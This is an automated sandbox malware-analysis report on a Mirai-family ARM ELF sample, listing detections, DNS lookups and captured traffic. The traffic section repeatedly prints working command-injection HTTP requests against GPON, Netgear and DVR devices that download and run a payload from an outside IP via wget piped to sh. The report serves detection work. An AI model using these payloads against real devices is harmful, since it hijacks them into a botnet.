Linux Analysis Report
firmware.armv7l.elf

Overview

General Information

Sample name: firmware.armv7l.elf
Analysis ID: 1502464
MD5: 6b070f94b644316ea982ea71b8f22486
SHA1: cdc58cdab08c05e592f0dcc231db7e54aa141753
SHA256: 1c46b788cd21053d730f5ea5c186d6e4f23aa62baf307003f0cd739914e4cb07
Tags: elffirmware
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes identical ELF files to multiple locations
Connects to many different domains
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes massive DNS lookups (> 100)
Executes the "hostname" command used to retrieve the computers name
HTTP GET or POST without a user agent
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: firmware.armv7l.elf Avira: detected
Antivirus detection for dropped file
Source: /usr/bin/ioxuhzzigj Avira: detection malicious, Label: LINUX/Mirai.bonb
Source: /usr/bin/urztrmjq Avira: detection malicious, Label: LINUX/Mirai.bonb
Multi AV Scanner detection for submitted file
Source: firmware.armv7l.elf ReversingLabs: Detection: 52%
Source: firmware.armv7l.elf Virustotal: Detection: 57% Perma Link

Networking
barindex
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kbak.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.dcae.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kbak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fflf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kcbl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kckc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kfkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fkcd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fbfa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: badf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: acca.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: cdck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ebbl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.beaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fack.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: eabb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kafl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: aekc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aabd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fbfa.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.acca.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.eabb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bdbf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aaaa.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.akcd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fflf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bfae.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bfae.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.kcdk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: akcd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.beek.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.bdba.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kcbl.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: aaaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kbak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kbak.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.fkcd.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: cklb.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: ebbl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lcfk.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.fkll.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: kdaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: beaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aeff.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kfck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lcfk.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: acce.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: kcdk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bfae.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: aeff.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cblf.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: kcbl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kfck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aacf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cblf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dafd.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.dfkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cblf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: beek.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fkll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bdak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: ccld.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.cbbb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bblk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kfkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.acce.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.kdaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dafd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fack.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dafd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.bblk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cdck.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: aekc.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: dfkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ddll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bfae.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.bdak.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.fbfa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cblf.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.aeke.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: ddll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.badf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ccld.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cklb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: bdbf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aekc.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.abdd.ru replaycode: Name error (3)
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 46538 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46560 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46582 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46602 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46626 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46650 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46676 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 57830 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 57858 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 57884 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 57906 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 57932 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 57950 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 57974 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 54040 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54048 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54054 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54058 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54062 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54066 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 54070 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 47086 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 47132 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 47162 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 47188 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 47216 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 47246 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 47272 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 33160 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33174 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33210 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33252 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33286 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33320 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33368 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 48004 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 48018 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 48036 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 48056 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 48078 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 48100 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 48116 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36400 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 36404 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 36410 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 36414 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 36418 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 36422 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 36426 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 52740 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52750 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52756 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52760 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52764 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52768 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52772 -> 82
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 251
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.14:54134 -> 48.46.49.0:8202
Source: global traffic TCP traffic: 192.168.2.14:44100 -> 48.46.49.51:0
Source: global traffic TCP traffic: 192.168.2.14:42502 -> 48.46.50.53:0
Source: global traffic TCP traffic: 192.168.2.14:40504 -> 8.8.8.8:81
Executes massive DNS lookups (> 100)
Source: global traffic DNS traffic detected: number of DNS queries: 251
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.15Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.16Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.15Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.16Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.18Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.18Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.23Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.23Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 138.68.84.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.101.152.161Connection: close
